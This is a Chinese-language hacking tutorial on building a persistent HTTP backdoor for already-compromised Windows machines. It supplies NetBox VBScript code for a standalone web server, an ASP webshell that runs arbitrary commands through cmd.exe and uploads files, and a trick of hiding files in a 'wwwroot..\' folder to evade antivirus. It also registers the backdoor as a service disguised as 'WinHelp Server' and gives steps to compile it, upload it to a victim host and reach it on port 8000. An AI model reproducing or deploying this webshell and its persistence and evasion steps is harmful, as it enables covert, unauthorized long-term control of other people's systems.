轻松拥有自己的超级Http后门

一、前言
　　在当今微软当道的年代，找肉鸡已经不是什么难事，各种各样的傻瓜工具大大方便了菜鸟们的入侵，但是往往入侵成功了，怎么去做好后门，把肉鸡尽可能久的抓住往往困惑着像我一样的菜鸟们。用过无数网上经典的后门后，在丢失了许多辛辛苦苦弄到的肉鸡后，我下定决心要写自己的后门。于是有了下面的文章。
　　二、Netbox简介
　　一个偶然的机会，我认识了Netbox。Netbox是一个使用脚本语言进行应用软件开发与发布的开发环境和运行平台，使用 NetBox，可以完全使用脚本语言(比如 VBScript，Javascript) 创建出稳定高效的应用软件，并且可以平滑移植到从 Windows 98 到 Windows .NET Server 的全部操作系统上。
　　它可以方便的将asp应用编译成为独立运行的执行程序，完全摆脱iis的束缚(将iis卸载后程序运行仍然正常)，在几乎所有的Windows版本上面直接运行，完全不需要考虑平台兼容性和对asp运行环境的要求。同时NetBox还提供大量扩展部件，使得WEB应用更加方便。说了那么多，大家肯定很想见识见识这位帅哥吧，好。
　　三、一起动手
　　如果大家已经对脚本语言VBScript或者Javascript有一点了解，那就可以跟我动手了。我们的任务是在建立一个与iis完全无关的web服务器，它可以为我们提供FSO的支持，以方便上传文件。并支持脚本宿主WSH,这样我们就能执行命令了。在网站根目录里我们可以放上自己的asp木马或其它的木马后门并可以随时执行。
　　首先需要建立我们的web服务器，这个服务器和IIS没有任何关系，即使卸载了IIS它也可以运行。利用NetBox的HttpServer对象就能轻易的办到。
　　在记事本里写入如下几行代码：
　　Set httpd = CreateObject(“NetBox.HttpServer”) *创建httpserver对象 If httpd.Create(“”, 8000) = 0 Then *web服务端口设为8000，可以自己改，不要和其他端口冲突就行了。 Set host = httpd.AddHost(“”, “\wwwroot”) *设置web服务的根目录为文件夹”wwwroot”。 host.EnableScript = true *使Web服务器能够理解服务器端脚本程序，既支持asp。 host.AddDefault “default.asp” host.AddDefault “default.htm” host.AddDefault “index.asp” host.AddDefault “index.htm” host.AddDefault “default.html” host.AddDefault “index.html” *设置缺省文件，相当与iis中的默认文档。 httpd.Start *开始服务 else httpd.Stop Shell.Quit 0 End If End Sub
　　将文件存为main.box。
　　这样一个支持asp的服务器源代码就写成功了，它可以让你的asp木马随心所欲的运行，而且不用担心会有日志记录，但是现在它还远不是一个后门，只是提供了与IIS相当的功能，为了防止后门被杀，我们不妨自己来写一个简单的CMD.ASP，当然不是那个所谓的最简短的asp后门了。我们要实现的功能是可以上传文件和执行命令。
　　这里只分析主要的代码，详细的代码附在了软件包里。
　　set pyeWSH=server.createobject(“WSCRIPT.SHELL”) *建立shell(wshshell)对象pyeWSH set pyeFSO=server.createobject(“scripting.filesystemobject”) *建立文件系统对象pyeFSO用于文件方面的操作 szTempFile=”C:\”& pyeFSO.GetTempName() *GetTempName()是fso建立临时文件的一种方法 Call pyeWSH.Run (“cmd.exe /c “&szCMD &”>”&szTempFile,0,true) *调用wshshell的run方法来执行命令，并把结果重定向到临时文件中 set oFile=pyeFSO.OpenTextFile(szTempFile,1,False,0) *以读的方式打开临时文件
思路应该很清楚，我简单说说。建立shell对象是用于执行命令，建立文件系统对象是用于将命令执行的结果输入到一个临时文件中并将文件内容读出来。要看到命令执行的结果只要加上这样一句：
　　response.write server.HTMLEncode(oFile.ReadAll)
　　就能读出临时文件的内容并显示出来。实现上传文件功能的代码也很简单。
　　注意这里是将上传的文件保存到了肉鸡上的一个“wwwroot.”的文件夹下面，这个文件夹只能在CMD下面用mkdir wwwroot..\ 建立。放在这个文件夹里的文件在一般情况下是看不到的，所以可以在一定程度上躲过杀毒软件的查杀，不过执行的时候也要麻烦一点了，因为放在这里面的程序用shell对象的run方法运行不了的，因为根本找不到这个要执行的文件。但奇怪的是可以将里面的文件copy到别的地方，所以需要执行时就是先要将文件copy到其它目录下，当然啦这么简单的事我们的后门完全可以做到。Asp后门就这样做好了，很简单吧?而且功能也不差，如果你够懒的话，也可以直接用别人的Asp后门。
　　然后我们将Web服务器做成一个真正的服务，也就是可以随系统一起启动，只需要加上这样一句：
　　Shell.Service.RunService “WinHelp Server”，”WinHelp Server”，”Windows Help service ”
　　引号内依次为服务名，服务显示名，服务描述字符串，可以发挥想象自己改。
　　安装服务的命令是：myapp -install，要注意的是这个命令只是将程序变成服务，并没有运行，所以要马上生效的话，就要输入myapp.exe以执行它。
　　卸载服务的命令是：myapp -remove，myapp表示文件的名称。
　　四、编译应用程序
　　没想到还有这一步吧?像一般的编译程序一样，源文件要变异了才能执行，编译需要使用工具Nbdw.exe，这个工具用于将NetBox 应用发布成为独立的应用程序。
　　点击选择源文件夹，找到我们存放源文件的目录，勾选要编译的文件，在输出文件里填上要生成的执行文件名，如pyedoor.exe，点 Build…，开始编译。
　　最后，我们得到了编译成功的那个可执行文件，使用时需要上传到远程主机上，执行pyedoor -install，就将后门以服务方式运行了，访问时只需在浏览器里输入www.target.com:8000/cmd.asp就可以看到我们的木马了。
　　相信熟悉网页木马的高手们不用我罗嗦了吧?但是要注意的是这个网页木马是将上传的文件放在“wwwroot..\”目录下的，即使在command框里输入dir wwwroot..\也看不到上传的文件，也执行不了，目的在于防止被杀。那万一需要执行该怎么办呢?聪明的你肯定想到了吧，对了，只要copy“wwroot..\”目录下的文件到别的文件夹下就行了。怎么样很简单吧?原来拥有自己的后门这么容易。
　　为了方便大家使用我把做好的后门，做成了自解压文件，里面有必需的源文件，还有一个配合后门的批处理。使用时只需把这个自解压文件上传到远程主机上执行就可以了。
　　五、自我总结
　　Netbox是一个新工具，本来不是为黑客服务的，但我们可以拿来，它还有很多值得开发的功能，很希望和大家一起研究。另外就是不要觉得编程之类的很复杂，只要有信心没有办不成的事。